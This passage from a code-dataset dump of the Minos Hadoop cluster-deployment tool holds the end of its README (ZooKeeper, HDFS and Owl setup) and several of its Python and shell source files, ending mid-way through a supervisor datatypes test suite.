dptst\n\nHere are some handy ways to manage the cluster:\n\n* Show the status of the ZooKeeper service:\n\n ./deploy show zookeeper dptst\n\n* Start/Stop/Restart the ZooKeeper cluster:\n\n ./deploy stop zookeeper dptst\n ./deploy start zookeeper dptst\n ./deploy restart zookeeper dptst\n\n* Clean up the ZooKeeper cluster:\n\n ./deploy cleanup zookeeper dptst\n\n* Rolling update the ZooKeeper cluster:\n\n ./deploy rolling_update zookeeper dptst\n\n#### Configuring HDFS\n\nNow it is time to configure the HDFS system. Here we set up a testing HDFS cluster named `dptst-example`, whose configuration file will be named as `hdfs-dptst-example.cfg`, as explained in the naming conventions.\n\nYou can edit `hdfs-dptst-example.cfg` under the `config/conf/hdfs` directory to configure the cluster. The `hdfs-dptst-example.cfg` is well commented and self explained, so we will not explain more here.\n\n#### Setting Up HDFS Cluster\n\nSetting up and managing an HDFS cluster is similar to setting up and managing a ZooKeeper cluster. The only difference is the cluster name, `dptst-example`, which implies that the corresponding ZooKeeper cluster is `dptst`:\n\n ./deploy install hdfs dptst-example\n ./deploy bootstrap hdfs dptst-example\n ./deploy show hdfs dptst-example\n ./deploy stop hdfs dptst-example\n ./deploy start hdfs dptst-example\n ./deploy restart hdfs dptst-example\n ./deploy rolling_update hdfs dptst-example --job=datanode\n ./deploy cleanup hdfs dptst-example\n\n#### Shell\n\nThe client tool also supports a very handy command named `shell`. You can use this command to manage the files on HDFS, tables on HBase, jobs on YARN, etc. Here are some examples about how to use the `shell` command to perform several different HDFS operations:\n\n ./deploy shell hdfs dptst-example dfs -ls /\n ./deploy shell hdfs dptst-example dfs -mkdir /test\n ./deploy shell hdfs dptst-example dfs -rm -R /test\nYou can run `./deploy --help` to see the detailed help messages.\n\n\n## Installing Owl\n\nOwl must be installed on the machine that you also use the [Client](#client) component, they both use the same set of cluster configuration files.\n\n### Prerequisites\n\n#### Install Gnuplot\n\nGnuplot is required for opentsdb, you can install it with the following command.\n\n Centos: sudo yum install gnuplot\n Ubuntu: sudo apt-get install gnuplot\n\n#### Install Mysql\n\n Ubuntu:\n sudo apt-get install mysql-server\n sudo apt-get install mysql-client\n\n Centos:\n yum install mysql-server mysql mysql-devel\n\n\n### Configuration\n\nConfigure the clusters you want to monitor with owl in `minos/config/owl/collector.cfg`. Following is an example that shows how to modify the configuration.\n\n [collector]\n # service name(space seperated)\n service = hdfs hbase\n\n [hdfs]\n # cluster name(space seperated)\n clusters=dptst-example\n # job name(space seperated)\n jobs=journalnode namenode datanode\n # url for collecotr, usually JMX url\n metric_url=/jmx?qry=Hadoop:*\n\n> **Note:** Some other configurations such as and `opentsdb port` is set in `minos/build/minos_config.py`. You can change the default port for avoiding port conflicts.\n\n### Start Owl\n\n cd minos\n ./build.sh start owl --owl_ip ${your_local_ip} --owl_port ${port_owl_monitor_will_listen}\n\nAfter starting Owl, you can access the web interface of the Owl. For example, if Owl listens on port 8088, and the machine's IP address is 192.168.1.11, you can access the following URL to view the Owl web interface:\n\n http://192.168.1.11:8088/\n\n### Stop Owl\n\n ./build.sh stop owl\n\n# FAQ\n\n1. When installing Mysql-python, you may get an error of `_mysql.c:44:23: error: my_config.h: No such file or directory (centos)` or `EnvironmentError: mysql_config not found (ubuntu)`. As mysql_config is part of mysql-devel, installing mysql-devel allows the installation of Mysql-python. So you may need to install it.\n\n ubuntu: sudo apt-get install libmysqlclient-dev\n centos: sudo yum install mysql-devel\n\n2. When installing twisted, you may get an error of `CompressionError: bz2 module is not available` and compile appears:\n\n Python build finished, but the necessary bits to build these modules were not found:\n _sqlite3 _tkinter bsddb185\n bz2 dbm dl\n\n Then, you may need to install bz2 and sqlite3 such as\n\n sudo apt-get install libbz2-dev\n sudo apt-get install libsqlite3-dev\n\n3. When setting up the stand-alone hbase on Ubuntu, you may fail to start it because of the `/etc/hosts` file. You can refer to <http://hbase.apache.org/book/quickstart.html#ftn.d2907e114> to fix the problem.\n\n4. When using the Minos client to install a service package, if you get an error of `socket.error: [Errno 101] Network is unreachable`, please check your tank server configuration in `deploy.cfg` file, you might miss it.\n\n> **Note:** See [Minos Wiki](https://github.com/XiaoMi/minos/wiki) for more advanced features.\n"
},
{
"alpha_fraction": 0.8369565010070801,
"alphanum_fraction": 0.8369565010070801,
"avg_line_length": 22,
"blob_id": "5fc494a55155a6d0fd3d467065401e51915d684f",
"content_id": "a5d080f0fc78567617a6d2b7865bb9f4c3b2efcf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 4,
"path": "/owl/business/admin.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom models import Business\n\nadmin.site.register(Business)\n"
},
{
"alpha_fraction": 0.6174242496490479,
"alphanum_fraction": 0.6212121248245239,
"avg_line_length": 17.85714340209961,
"blob_id": "d75005e9f1f075ede21cc3b401b2c7ac114d3e81",
"content_id": "70adae510517e88bf99071e808c8326d96ea0cd8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 264,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 14,
"path": "/config/template/bootstrap_zk.sh.tmpl",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nmyid_file=%myid_file\nhost_id=%host_id\n\nif [ -e $myid_file ]; then\n myid=`cat $myid_file`\n if [ $myid -ne $host_id ]; then\n echo \"myid has existed ($myid) but doesn't match with host id $host_id\"\n exit 1\n fi\nelse\n echo $host_id > $myid_file\nfi\n"
},
{
"alpha_fraction": 0.5059021711349487,
"alphanum_fraction": 0.5134907364845276,
"avg_line_length": 27.238094329833984,
"blob_id": "b3b5af2e80aa536bf2fc397c1f8b2df7819a667d",
"content_id": "39f3596df5fe86bab1a16140d5eeeed4e1454724",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1186,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 42,
"path": "/build/build_virtualenv.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n#######################\n# check python version\n#######################\n\nSYS_PYTHON=`which python 2>/dev/null`\nif [ ! $SYS_PYTHON ]; then\n echo \"Error: No python found!\" \\\n \"Please install Python 2.7 or later from <http://www.python.org> firstly.\"\n exit 4\nfi\n\n####################\n# build virtual-env\n####################\n\n# Create virtual environment if not exists.\nif ! [ -x $ENV_PYTHON ]; then\n echo \"Creating virtual environment at $BUILD_ENV_ROOT\"\n $SYS_PYTHON $VIRTUAL_BOOTSTRAP_ENTRY --no-site-packages $BUILD_ENV_ROOT 2>&1\n if [ -x $ENV_PYTHON ]; then\n echo \"$BUILD_ENV_ROOT ready\"\n else\n echo \"Creating virtual environment failed\"\n exit 5\n fi\nfi\n\n###############################################\n# Build Minos client, Tank, Supervisor offline\n###############################################\nif [ $# -gt 1 ]; then\n PYTHONPATH=$CLIENT_ROOT $ENV_PYTHON $BUILD_COMPONENTS_ENTRY $@\nfi\n\n############################################################\n# build Minos client, install prerequisite python libraries\n############################################################\nif [ $? -eq 0 ]; then\n PYTHONPATH=$CLIENT_ROOT $ENV_PYTHON $BUILD_CLIENT_ENTRY\nfi\n"
},
{
"alpha_fraction": 0.6129512190818787,
"alphanum_fraction": 0.6151842474937439,
"avg_line_length": 27.585105895996094,
"blob_id": "298fd29c2132817b853cb59083ca06fced7ed85b",
"content_id": "9b49618c2f7352456e40634dad054764eff2aeba",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2687,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 94,
"path": "/client/tank_client.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import httplib\nimport mimetypes\nimport os\nimport urllib\n\nclass TankClient:\n '''\n The package server client.\n '''\n def __init__(self, host, port=80, upload_uri='/upload_package/',\n check_uri='/check_package/'):\n self.conn = httplib.HTTPConnection(host, port)\n self.upload_uri = upload_uri\n self.check_uri = check_uri\n\n def check_package(self, artifact, checksum):\n '''\n Check whether a package of specified artifact and checksum already\n existed on the package server.\n\n @param artifact the package artifact\n @param checksum the package checksum\n @return string the package infomation if the package already existed,\n otherwise None\n '''\n data = urllib.urlencode({\n 'artifact': artifact,\n 'checksum': checksum,\n })\n\n self.conn.request('GET', '%s?%s' % (self.check_uri, data))\n response = self.conn.getresponse()\n\n if response.status == 200:\n body = response.read()\n if body.startswith('{'):\n return body\n return None\n\n def upload(self, package_path, artifact, revision):\n '''\n Upload the specified package to the package server.\n\n @param package_path the package path\n @param artifact the package artifact\n @param revision the package revision\n @return integer the http status code\n '''\n param = {\n 'artifact': artifact,\n 'revision': revision,\n }\n\n content_type, body = self._encode_multipart_formdata(param,\n [('file', package_path, open(package_path, 'rb').read())])\n\n headers = {\n 'Content-Type': content_type,\n 'Content-Length': str(len(body)),\n }\n\n self.conn.request('POST', self.upload_uri, body, headers)\n response = self.conn.getresponse()\n return response.status\n\n def _encode_multipart_formdata(self, fields, files):\n LIMIT = '----------lImIt_of_THE_fIle_eW_$'\n CRLF = '\\r\\n'\n L = []\n\n for (key, value) in fields.iteritems():\n L.append('--' + LIMIT)\n L.append('Content-Disposition: form-data; name=\"%s\"' % key)\n L.append('')\n L.append(value)\n\n for (key, filename, value) in files:\n L.append('--' + LIMIT)\n L.append('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (key, filename))\n L.append('Content-Type: %s' % self._get_content_type(filename))\n L.append('')\n L.append(value)\n L.append('--' + LIMIT + '--')\n L.append('')\n\n body = CRLF.join(L)\n content_type = 'multipart/form-data; boundary=%s' % LIMIT\n return content_type, body\n\n def _get_content_type(self, filename):\n return mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.7457107901573181,
"alphanum_fraction": 0.750612735748291,
"avg_line_length": 32.306121826171875,
"blob_id": "64b6865788280b37f92029dec60ba346fa17635e",
"content_id": "2c5d874af6e8528f93070bfd39b13f0049887b0b",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1632,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 49,
"path": "/supervisor/supervisor/medusa/demo/publish.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# Demonstrates use of the auth and put handlers to support publishing\n# web pages via HTTP.\n\n# It is also possible to set up the ftp server to do essentially the\n# same thing.\n\n# Security Note: Using HTTP with the 'Basic' authentication scheme is\n# only slightly more secure than using FTP: both techniques involve\n# sending a unencrypted password of the network (http basic auth\n# base64-encodes the username and password). The 'Digest' scheme is\n# much more secure, but not widely supported yet. <sigh>\n\nfrom supervisor.medusa import asyncore_25 as asyncore\nfrom supervisor.medusa import default_handler\nfrom supervisor.medusa import http_server\nfrom supervisor.medusa import put_handler\nfrom supervisor.medusa import auth_handler\nfrom supervisor.medusa import filesys\n\n# For this demo, we'll just use a dictionary of usernames/passwords.\n# You can of course use anything that supports the mapping interface,\n# and it would be pretty easy to set this up to use the crypt module\n# on unix.\n\nusers = { 'mozart' : 'jupiter', 'beethoven' : 'pastoral' }\n\n# The filesystem we will be giving access to\nfs = filesys.os_filesystem('/home/medusa')\n\n# The 'default' handler - delivers files for the HTTP GET method.\ndh = default_handler.default_handler(fs)\n\n# Supports the HTTP PUT method...\nph = put_handler.put_handler(fs, '/.*')\n\n# ... but be sure to wrap it with an auth handler:\nah = auth_handler.auth_handler(users, ph)\n\n# Create a Web Server\nhs = http_server.http_server(ip='', port=8080)\n\n# install the handlers we created:\n\nhs.install_handler(dh) # for GET\nhs.install_handler(ah) # for PUT\n\nasyncore.loop()\n"
},
{
"alpha_fraction": 0.6332341432571411,
"alphanum_fraction": 0.6336591839790344,
"avg_line_length": 30.783782958984375,
"blob_id": "2a091bfa7d70592ba0271a82c21ef485320e2703",
"content_id": "375c47a8f11581c80d04f718c2b9c7f1be409f2d",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2353,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 74,
"path": "/supervisor/superlance/process_exit_monitor.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python -u\n\n##############################################################################\n#\n# This script is subject to the execution of the post script when some process\n# has entered the stopped or exited state.\n#\n##############################################################################\n\nimport ConfigParser\nimport os\nimport re\nimport subprocess\nimport sys\n\nfrom supervisor import childutils\n\nJOB_INSTANCES_REGEX = re.compile('(?P<job>[A-Za-z_]+)(?P<instance_id>\\d+)?$')\n\ndef handle_event(payload):\n '''\n Execute the post script when the monitored events happen\n '''\n pheaders, pdata = childutils.eventdata(payload+'\\n')\n name_list = pheaders['groupname'].split('--')\n if len(name_list) == 3:\n service, cluster, job = name_list\n else:\n return None\n\n childutils.pcomm.stderr(childutils.get_asctime()+' Process %(processname)s '\n 'in group %(groupname)s exited from state %(from_state)s. '\n 'Now execute the post script.\\n' % pheaders)\n\n supervisor_config_path = '%s/../supervisord.conf' % os.path.dirname(__file__)\n if not os.path.exists(supervisor_config_path):\n childutils.pcomm.stderr('Cannot find the config file: supervisord.conf.\\n')\n\n parser = ConfigParser.SafeConfigParser()\n parser.read([supervisor_config_path])\n\n sys.path.append('%s/../deployment' % os.path.dirname(__file__))\n from rpcinterface import DEFAULT_APP_ROOT\n app_root = parser.get('rpcinterface:deployment', 'app_root', DEFAULT_APP_ROOT)\n reg_expr = JOB_INSTANCES_REGEX.match(job)\n job = reg_expr.group('job')\n\n if reg_expr.group('instance_id'):\n instance_id = reg_expr.group('instance_id')\n service_root = '%s/%s/%s/%s/%s' % (app_root, service, cluster, job, instance_id)\n else:\n service_root = '%s/%s/%s/%s' % (app_root, service, cluster, job)\n\n if not os.path.exists('%s/post.sh' % service_root):\n childutils.pcomm.stderr('No post.sh for %s found.\\n' % service)\n return None\n\n cmd = ['/bin/bash', '%s/post.sh' % service_root]\n subprocess.call(cmd)\n\n\ndef main():\n process_state_events = ['PROCESS_STATE_STOPPED', 'PROCESS_STATE_BACKOFF',\n 'PROCESS_STATE_EXITED', 'PROCESS_STATE_FATAL']\n while True:\n headers, payload = childutils.listener.wait()\n\n if headers['eventname'] in process_state_events:\n handle_event(payload)\n\n childutils.listener.ok()\n\nif __name__ == '__main__':\n main()\n\n"
},
{
"alpha_fraction": 0.7003467082977295,
"alphanum_fraction": 0.7028231620788574,
"avg_line_length": 32.650001525878906,
"blob_id": "4ae04eca5cc28dafd2d7ee61e4345f8f19c4b019",
"content_id": "bc915d7c2b699bab47df9e5b25dd9b633d606d67",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2019,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 60,
"path": "/opentsdb/tsdb_register.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\nimport sys\nimport time\n\nroot_path = os.path.abspath(\n os.path.dirname(os.path.realpath(__file__))+ '/..')\n\nclient_path = os.path.join(root_path, 'client')\nsys.path.append(client_path)\n\ndeploy_utils = __import__('deploy_utils')\nconf_path = deploy_utils.get_config_dir()\n\nopentsdb_config_path = os.path.join(conf_path, 'opentsdb')\nsys.path.append(opentsdb_config_path)\nmetrics_collector_config = __import__('metrics_collector_config')\n\nmetrics_url = metrics_collector_config.metrics_url\nopentsdb_bin_path = metrics_collector_config.opentsdb_bin_path\nopentsdb_extra_args = metrics_collector_config.opentsdb_extra_args\ncollect_period = metrics_collector_config.collect_period\n\nlogger_metrics = logging.getLogger('metrics')\nlogger_quota = logging.getLogger('quota')\n\n\nclass TsdbRegister:\n def __init__(self):\n self.new_keys = []\n self.register_keys = set()\n\n def register_new_keys_to_tsdb(self):\n start_time = time.time()\n\n size = len(self.new_keys)\n offset = 0\n MAX_REGISTERED_KEYS = 1000;\n\n # register MAX_REGISTERED_KEYS one time\n while size - offset >= MAX_REGISTERED_KEYS:\n keys_to_add = self.new_keys[offset:offset+MAX_REGISTERED_KEYS]\n mkmetric_operation = '%s mkmetric %s %s' % (opentsdb_bin_path, opentsdb_extra_args, ' '.join(keys_to_add))\n logger_metrics.info(mkmetric_operation)\n logger_quota.info(mkmetric_operation)\n os.system(mkmetric_operation)\n offset += MAX_REGISTERED_KEYS\n\n # register remainings\n if offset < size:\n keys_to_add = self.new_keys[offset:]\n mkmetric_operation = '%s mkmetric %s %s' % (opentsdb_bin_path, opentsdb_extra_args, ' '.join(keys_to_add))\n logger_metrics.info(mkmetric_operation)\n logger_quota.info(mkmetric_operation)\n os.system(mkmetric_operation)\n\n self.new_keys = []\n registered_metrics_log = \"Registered %d metrics cost %f secs\" % (size, time.time() - start_time)\n logger_metrics.info(registered_metrics_log)\n logger_quota.info(registered_metrics_log)\n"
},
{
"alpha_fraction": 0.6226146221160889,
"alphanum_fraction": 0.6247507929801941,
"avg_line_length": 31.660465240478516,
"blob_id": "4aa30d47d3648f20d3ffb65d0a53aca78785bedf",
"content_id": "2583ce7af66c3b27144d239b59c2dbf4d6cac19c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7022,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 215,
"path": "/client/supervisor_client.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import socket\nimport xmlrpclib\n\nclass SupervisorClient:\n '''\n The supervisor client.\n '''\n def __init__(self, host, port, user, passwd, service, cluster, job, instance_id):\n self.proxy = xmlrpclib.ServerProxy('http://%s:%s@%s:%d' % (\n user, passwd, host, port))\n self.service = service\n self.cluster = cluster\n self.job = job\n self.instance_id = instance_id\n\n def get_available_data_dirs(self):\n '''\n Get the available data directories of the remote server.\n '''\n # The `if` statement block is intended to be compatible with the old supervisor.\n # After all supervisors upgrading to the latest version,\n # the `if` statement block will be deleted.\n # The following similar block will not say more.\n if self.instance_id == -1:\n return self.proxy.deployment.get_available_data_dirs(self.service,\n self.cluster, self.job)\n else:\n return self.proxy.deployment.get_available_data_dirs(self.service,\n self.cluster, self.job, self.instance_id)\n\n def get_data_dirs(self):\n '''\n Get the currently used data directories of this job.\n '''\n if self.instance_id == -1:\n return self.proxy.deployment.get_data_dirs(self.service,\n self.cluster, self.job)\n else:\n return self.proxy.deployment.get_data_dirs(self.service,\n self.cluster, self.job, self.instance_id)\n\n def get_log_dir(self):\n '''\n Get the log directory of this job.\n '''\n if self.instance_id == -1:\n return self.proxy.deployment.get_log_dir(self.service,\n self.cluster, self.job)\n else:\n return self.proxy.deployment.get_log_dir(self.service,\n self.cluster, self.job, self.instance_id)\n\n def get_cleanup_token(self):\n '''\n Get the cleanup token of this job.\n '''\n if self.instance_id == -1:\n return self.proxy.deployment.get_cleanup_token(self.service,\n self.cluster, self.job)\n else:\n return self.proxy.deployment.get_cleanup_token(self.service,\n self.cluster, self.job, self.instance_id)\n\n def get_run_dir(self):\n '''\n Get the running directory of this job.\n '''\n if self.instance_id == -1:\n return self.proxy.deployment.get_run_dir(self.service,\n self.cluster, self.job)\n else:\n return self.proxy.deployment.get_run_dir(self.service,\n self.cluster, self.job, self.instance_id)\n\n def get_package_dir(self):\n '''\n Get the package directory of this job.\n '''\n if self.instance_id == -1:\n return self.proxy.deployment.get_package_dir(self.service,\n self.cluster, self.job)\n else:\n return self.proxy.deployment.get_package_dir(self.service,\n self.cluster, self.job, self.instance_id)\n\n # The reture value of get_package_dir() is the symbol link path of\n # the package dir, the return value of get_real_package_dir() is\n # the result of os.readlink(get_package_dir())\n def get_real_package_dir(self):\n if self.instance_id == -1:\n return self.proxy.deployment.get_real_package_dir(\n self.service, self.cluster, self.job)\n else:\n return self.proxy.deployment.get_real_package_dir(\n self.service, self.cluster, self.job, self.instance_id)\n\n def get_current_package_dir(self):\n return self.proxy.deployment.get_current_package_dir(self.service, self.cluster)\n\n def bootstrap(self, artifact, force_update=False, package_name='',\n revision='', timestamp='', cleanup_token='', bootstrap_script='',\n data_dir_indexes='0', **config_files):\n '''\n Bootstrap the job.\n '''\n try:\n config_dict = {\n 'artifact': artifact,\n 'force_update': force_update,\n 'package_name': package_name,\n 'revision': revision,\n 'timestamp': timestamp,\n 'cleanup_token': cleanup_token,\n 'bootstrap.sh': bootstrap_script,\n 'data_dir_indexes': data_dir_indexes,\n 'config_files': config_files,\n }\n if self.instance_id == -1:\n message = self.proxy.deployment.bootstrap(self.service, self.cluster,\n self.job, config_dict)\n else:\n message = self.proxy.deployment.bootstrap(self.service, self.cluster,\n self.job, config_dict, self.instance_id)\n except (xmlrpclib.Error, socket.error), e:\n raise e\n return message\n\n def start(self, artifact, force_update=False, package_name='', revision='',\n timestamp='', http_url='', start_script='', **config_files):\n '''\n Start the job.\n '''\n try:\n config_dict = {\n 'start.sh': start_script,\n 'artifact': artifact,\n 'config_files': config_files,\n 'http_url': http_url,\n 'force_update': force_update,\n 'package_name': package_name,\n 'revision': revision,\n 'timestamp': timestamp,\n }\n if self.instance_id == -1:\n message = self.proxy.deployment.start(self.service, self.cluster,\n self.job, config_dict)\n else:\n message = self.proxy.deployment.start(self.service, self.cluster,\n self.job, config_dict, self.instance_id)\n except (xmlrpclib.Error, socket.error), e:\n message = str(e)\n return message\n\n def stop(self):\n '''\n Stop the job.\n '''\n try:\n if self.instance_id == -1:\n message = self.proxy.deployment.stop(self.service, self.cluster,\n self.job, dict())\n else:\n message = self.proxy.deployment.stop(self.service, self.cluster,\n self.job, dict(), self.instance_id)\n except (xmlrpclib.Error, socket.error), e:\n message = str(e)\n return message\n\n def show(self):\n '''\n Show the running status the job.\n '''\n try:\n if self.instance_id == -1:\n message = self.proxy.deployment.show(self.service, self.cluster,\n self.job, dict())\n else:\n message = self.proxy.deployment.show(self.service, self.cluster,\n self.job, dict(), self.instance_id)\n except (xmlrpclib.Error, socket.error), e:\n message = str(e)\n return message\n\n def restart(self, start_script, **config_files):\n '''\n Restart the job.\n '''\n if self.stop() == 'OK':\n return self.start(start_script, **config_files)\n else:\n real_instance_id = self.instance_id\n real_instance_id = 0 if (real_instance_id == -1) else real_instance_id\n return 'Stop %s-%s-%s%s failed' % (self.service, self.cluster, self.job, real_instance_id)\n\n def cleanup(self, cleanup_token, cleanup_script):\n '''\n Cleanup the job's data and log directories.\n '''\n try:\n config_dict = {\n 'cleanup_token': cleanup_token,\n 'cleanup.sh': cleanup_script,\n }\n if self.instance_id == -1:\n message = self.proxy.deployment.cleanup(self.service, self.cluster,\n self.job, config_dict)\n else:\n message = self.proxy.deployment.cleanup(self.service, self.cluster,\n self.job, config_dict, self.instance_id)\n except (xmlrpclib.Error, socket.error), e:\n message = str(e)\n return message\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.7305825352668762,
"alphanum_fraction": 0.7305825352668762,
"avg_line_length": 20.6842098236084,
"blob_id": "ca5f9cd7a1ec75d8c95112e3bcb29eb2521008b9",
"content_id": "c00089c9ac38b7e96a89c2a0a356c2099dbd9bf3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 412,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 19,
"path": "/owl/machine/management/commands/load_machine_list.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import csv\nimport logging\nimport sys\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom machine.models import Machine\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n rows = [row for row in csv.DictReader(sys.stdin)]\n Machine.objects.all().delete()\n for row in rows:\n Machine.objects.create(**row)\n"
},
{
"alpha_fraction": 0.5267489552497864,
"alphanum_fraction": 0.5720164775848389,
"avg_line_length": 14.1875,
"blob_id": "8f8a0e69a724a65ad17873836c1c281f3dea931f",
"content_id": "42d6c120237a237dd72ace7e944f703d436eb1da",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 243,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 16,
"path": "/supervisor/stop_supervisor.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nif [ $# -lt 1 ]; then\n echo \"usage: $0 PID\"\n exit 1\nfi\n\nkill $1 && \\\nwhile [ 1 ]; do\n if netstat -nlap 2>/dev/null |grep \":9001\" |grep LISTEN; then\n sleep 1\n echo \"Wait for supervisor exiting...\"\n else\n break\n fi\ndone\n"
},
{
"alpha_fraction": 0.6156549453735352,
"alphanum_fraction": 0.6311431527137756,
"avg_line_length": 37.858795166015625,
"blob_id": "d234a103026365d5b4adbad5ce98500595cc5e73",
"content_id": "a0f7bd0cca1eb94aea97d09c832768b4dd0bb6a9",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16787,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 432,
"path": "/supervisor/supervisor/tests/test_datatypes.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "\"\"\"Test suite for supervisor.datatypes\"\"\"\n\nimport sys\nimport os\nimport unittest\nimport socket\nimport tempfile\nfrom mock import Mock, patch, sentinel\nfrom supervisor import datatypes\n\nclass DatatypesTest(unittest.TestCase):\n def test_boolean_returns_true_for_truthy_values(self):\n for s in datatypes.TRUTHY_STRINGS:\n actual = datatypes.boolean(s)\n self.assertEqual(actual, True)\n\n def test_boolean_returns_true_for_upper_truthy_values(self):\n for s in map(str.upper, datatypes.TRUTHY_STRINGS):\n actual = datatypes.boolean(s)\n self.assert_(actual, True)\n\n def test_boolean_returns_false_for_falsy_values(self):\n for s in datatypes.FALSY_STRINGS:\n actual = datatypes.boolean(s)\n self.assertEqual(actual, False)\n\n def test_boolean_returns_false_for_upper_falsy_values(self):\n for s in map(str.upper, datatypes.FALSY_STRINGS):\n actual = datatypes.boolean(s)\n self.assertEqual(actual, False)\n\n def test_boolean_raises_value_error_for_bad_value(self):\n self.assertRaises(ValueError,\n datatypes.boolean, 'not-a-value')\n\n def test_list_of_strings_returns_empty_list_for_empty_string(self):\n actual = datatypes.list_of_strings('')\n self.assertEqual(actual, [])\n\n def test_list_of_strings_returns_list_of_strings_by_comma_split(self):\n actual = datatypes.list_of_strings('foo,bar')\n self.assertEqual(actual, ['foo', 'bar'])\n\n def test_list_of_strings_returns_strings_with_whitespace_stripped(self):\n actual = datatypes.list_of_strings(' foo , bar ')\n self.assertEqual(actual, ['foo', 'bar'])\n\n def test_list_of_strings_raises_value_error_when_comma_split_fails(self):\n self.assertRaises(ValueError,\n datatypes.list_of_strings, 42)\n\n def test_list_of_ints_returns_empty_list_for_empty_string(self):\n actual = datatypes.list_of_ints('')\n self.assertEqual(actual, [])\n\n def test_list_of_ints_returns_list_of_ints_by_comma_split(self):\n actual = datatypes.list_of_ints('1,42')\n self.assertEqual(actual, [1,42])\n\n def test_list_of_ints_returns_ints_even_if_whitespace_in_string(self):\n actual = datatypes.list_of_ints(' 1 , 42 ')\n self.assertEqual(actual, [1,42])\n\n def test_list_of_ints_raises_value_error_when_comma_split_fails(self):\n self.assertRaises(ValueError,\n datatypes.list_of_ints, 42)\n\n def test_list_of_ints_raises_value_error_when_one_value_is_bad(self):\n self.assertRaises(ValueError,\n datatypes.list_of_ints, '1, bad, 42')\n\n def test_list_of_exitcodes(self):\n vals = datatypes.list_of_exitcodes('1,2,3')\n self.assertEqual(vals, [1,2,3])\n vals = datatypes.list_of_exitcodes('1')\n self.assertEqual(vals, [1])\n self.assertRaises(ValueError, datatypes.list_of_exitcodes, 'a,b,c')\n self.assertRaises(ValueError, datatypes.list_of_exitcodes, '1024')\n self.assertRaises(ValueError, datatypes.list_of_exitcodes, '-1,1')\n\n def test_hasattr_automatic(self):\n datatypes.Automatic\n\n def test_dict_of_key_value_pairs_returns_empty_dict_for_empty_str(self):\n actual = datatypes.dict_of_key_value_pairs('')\n self.assertEqual({}, actual)\n\n def test_dict_of_key_value_pairs_returns_dict_from_single_pair_str(self):\n actual = datatypes.dict_of_key_value_pairs('foo=bar')\n expected = {'foo': 'bar'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_returns_dict_from_multi_pair_str(self):\n actual = datatypes.dict_of_key_value_pairs('foo=bar,baz=qux')\n expected = {'foo': 'bar', 'baz': 'qux'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_returns_dict_even_if_whitespace(self):\n actual = datatypes.dict_of_key_value_pairs(' foo = bar , baz = qux ')\n expected = {'foo': 'bar', 'baz': 'qux'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_returns_dict_even_if_newlines(self):\n actual = datatypes.dict_of_key_value_pairs('foo\\n=\\nbar\\n,\\nbaz\\n=\\nqux')\n expected = {'foo': 'bar', 'baz': 'qux'}\n self.assertEqual(actual, expected)\n\n def test_dict_of_key_value_pairs_handles_commas_inside_apostrophes(self):\n actual = 